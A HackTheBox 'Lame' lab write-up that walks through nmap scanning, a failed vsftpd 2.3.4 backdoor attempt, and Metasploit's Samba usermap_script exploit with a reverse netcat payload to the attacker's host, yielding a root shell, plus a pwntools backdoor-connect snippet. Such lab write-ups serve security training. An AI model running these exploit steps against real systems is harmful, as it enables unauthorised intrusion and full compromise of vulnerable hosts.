HackTheBox-Machines Lame Writeup

kazma, founder and president of the NCKU Information Security Club

Brief Intro

Lately a lot of people around me who are studying for certifications have recommended warming up on HackTheBox beforehand, so today I am starting my HTB journey. After some googling I found that legendary OSCP box list, and also noticed that HTB splits into two sites: academy, which as the name suggests is for learning, and the main site, which mostly hosts labs and is our target this time.
One more thing I want to share: I was lazy and hesitated a bit before deciding to come back and write this up, so here is the mindset I settled on:

  1. People usually fall into one of two camps: for a given type of challenge they either always write a writeup or never do, so I decided to build the note-taking habit from the very first easy box.
  2. Taking notes is less of a hassle than it seems; it is mainly recording the commands or ideas behind the key steps and dumping the exploit here for safekeeping, which does not take much time.
  3. Turning notes into a blog post forces me to actually understand everything; when practising alone it is easy to gloss over things I only half understand.
  4. I will keep coming back to my own notes; my own wording and structure are what I know best, and even now in CTFs I often refer to my old notes.

Alright, let's get started!

Exploitation

The first thing to do is usually to find out which services are open; we can investigate with nmap:

└──╼ [★]$ sudo nmap -sV 10.10.10.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 23:11 CDT
Nmap scan report for 10.10.10.3
Host is up (0.0029s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.24 seconds

We can see that ports 21, 22, 139 and 445 are open, and thanks to the -sV flag we also get the service versions. vsftpd 2.3.4 is a version with a known vulnerability, so we can go after it with Metasploit:

└──╼ [★]$ msfconsole
Metasploit tip: When in a module, use back to go back to the top level
prompt


. .
.

dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB

dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP

.
.
o To boldly go where no
shell has gone before


=[ metasploit v6.3.44-dev ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search vsftpd 2.3.4

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

[msf](Jobs:0 Agents:0) >> use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
l
RPORT 21 yes The target port (TCP)


Payload options (cmd/unix/interact):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Automatic



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

That doesn't seem to work; we'll explain why later.
Looking back at the other possible attack surface: Samba is open but nmap did not show a specific version. We can use Metasploit for that as well:

[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> search smb_version

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_version normal No SMB Version Detection


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version

[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> use 0
[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> show options

Module options (auxiliary/scanner/smb/smb_version):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
l
THREADS 1 yes The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> run

[*] 10.10.10.3:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 10.10.10.3:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 10.10.10.3: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We found Samba 3.0.20-Debian, which is likewise a vulnerable version, so we keep using Metasploit:

[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> search samba 3.0.20

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

[msf](Jobs:0 Agents:0) auxiliary(scanner/smb/smb_version) >> use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
l
RPORT 139 yes The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 94.237.79.118 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set lhost tun0
lhost => 10.10.14.22
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> run

[*] Started reverse TCP handler on 10.10.14.22:4444
[*] Command shell session 1 opened (10.10.14.22:4444 -> 10.10.10.3:41231) at 2024-08-10 23:31:16 -0500

id
uid=0(root) gid=0(root)
find / -name 'user.txt' 2>/dev/null
/home/makis/user.txt
find / -name 'root.txt' 2>/dev/null
/root/root.txt

We got a reverse shell, and since it landed us directly with the highest privileges, we already have all the flags and no privilege escalation is needed.

Discussion

The official material actually prompts us to dig a bit deeper, for example:
Q: Why did the ftp backdoor fail earlier?
A: Since we already have root on the machine, we can look at what actually happened. First, a small trick to make the reverse shell nicer to use, then a look at what the machine is currently listening on:

python -c 'import pty; pty.spawn("bash")'
root@lame:/# netstat -tnlp
netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN 5448/xinetd
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN 5448/xinetd
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN 5448/xinetd
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN 5584/jsvc
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 5643/unrealircd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 5171/mysqld
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN 5625/rmiregistry
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 5643/unrealircd
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 5425/smbd
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 5646/Xtightvnc
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 4626/portmap
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 5646/Xtightvnc
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 5604/apache2
tcp 0 0 0.0.0.0:48433 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN 5629/ruby
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN 5584/jsvc
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN 5448/xinetd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 5448/xinetd
tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN 5024/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 5024/named
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 5448/xinetd
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 5252/postgres
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 5415/master
tcp 0 0 0.0.0.0:50201 0.0.0.0:* LISTEN 5347/rpc.mountd
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 5024/named
tcp 0 0 0.0.0.0:60955 0.0.0.0:* LISTEN 4644/rpc.statd
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5425/smbd
tcp 0 0 0.0.0.0:43838 0.0.0.0:* LISTEN 5625/rmiregistry
tcp6 0 0 :::2121 :::* LISTEN 5522/proftpd: (acce
tcp6 0 0 :::3632 :::* LISTEN 5279/distccd
tcp6 0 0 :::53 :::* LISTEN 5024/named
tcp6 0 0 :::22 :::* LISTEN 5048/sshd
tcp6 0 0 :::5432 :::* LISTEN 5252/postgres
tcp6 0 0 ::1:953 :::* LISTEN 5024/named
root@lame:/#

We can see that it is actually listening on quite a lot, yet none of it showed up in the scan, which means a firewall is probably blocking those ports. Looking at the vsftpd 2.3.4 exploit we used, we were originally trying to open a reverse shell on port 6200:

# Excerpt: a method of the exploit script's class. self.p is a pwntools log.progress()
# object and self.ip is the target address; the script needs `from pwn import *`
# (for remote) and `from time import sleep`.
def get_shell(self):
    self.p.status("Connecting To Backdoor...")
    sleep(1)
    io = remote(self.ip, 6200)  # the triggered backdoor listens on TCP 6200
    self.p.success("Got Shell!!!")
    io.interactive()
    io.close()

We can check this: right now nothing is listening on 6200, but after we send the attack script the machine does start listening on 6200, and connecting with nc also gets a shell without trouble. This means the firewall is most likely restricting external traffic so we could not get the shell from outside, so at this point we can be fairly sure the firewall is to blame.
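The reasoning above boils down to comparing what the host is actually listening on with what an external scan can see. As an added defender-side check (not part of the original writeup), the script below parses excerpts of the nmap and netstat output quoted on this page and lists the listening services that the firewall hides from the outside, which is exactly the exposure review a host owner would run; the function names are my own.

```python
import re

# Excerpt of the nmap -sV output shown above (only the port table is needed).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
"""

# Excerpt of the `netstat -tnlp` output taken on the host above.
NETSTAT_OUTPUT = """\
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 5448/xinetd
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 5425/smbd
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5425/smbd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 5171/mysqld
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN 5448/xinetd
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 5024/named
tcp6 0 0 :::22 :::* LISTEN 5048/sshd
tcp6 0 0 :::3632 :::* LISTEN 5279/distccd
"""

def nmap_open_ports(text):
    """Set of TCP ports that nmap reported as open."""
    return {int(m.group(1)) for m in re.finditer(r"^(\d+)/tcp\s+open", text, re.M)}

def netstat_listeners(text):
    """Map each TCP port bound to a non-loopback address to its PID/program."""
    pat = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\s+(\S+)", re.M)
    listeners = {}
    for addr, port, prog in pat.findall(text):
        if addr in ("127.0.0.1", "::1"):
            continue  # loopback-only sockets are never reachable from outside
        listeners[int(port)] = prog
    return listeners

def filtered_services(nmap_text, netstat_text):
    """Listening services the external scan did not see: filtered by the firewall."""
    visible = nmap_open_ports(nmap_text)
    return {p: prog for p, prog in netstat_listeners(netstat_text).items() if p not in visible}

if __name__ == "__main__":
    for port, prog in sorted(filtered_services(NMAP_OUTPUT, NETSTAT_OUTPUT).items()):
        print(f"port {port} ({prog}) is listening but hidden by the firewall")
```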

Pwned !!!

lame

  • Title: HackTheBox-Machines Lame Writeup
  • Author: kazma
  • Created at: 2024-08-11 11:34:23
  • Updated at: 2024-08-11 15:00:48
  • Link: https://kazma.tw/2024/08/11/HackTheBox-Machines-Lame-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.